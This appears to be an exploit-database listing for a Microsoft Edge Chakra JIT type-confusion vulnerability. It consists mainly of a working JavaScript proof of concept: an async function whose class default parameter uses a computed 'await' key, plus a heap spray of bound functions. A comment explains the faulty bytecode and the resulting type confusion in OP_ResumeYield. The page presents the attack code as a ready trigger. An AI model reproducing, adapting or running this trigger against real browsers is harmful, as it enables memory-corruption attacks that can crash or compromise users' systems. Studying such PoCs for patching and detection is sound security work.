Microsoft edge chakra jit parameter scope parsing type confusion Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-08-17 |
Type : dos |
Platform : windows
This exploit / vulnerability Microsoft edge chakra jit parameter scope parsing type confusion is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
// PoC:
async function trigger(a = class b {
[await 1]() {
}
}) {
}
let spray = [];
for (let i = 0; i < 100000; i++) {
spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}
trigger();
/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/
Microsoft edge chakra jit parameter scope parsing type confusion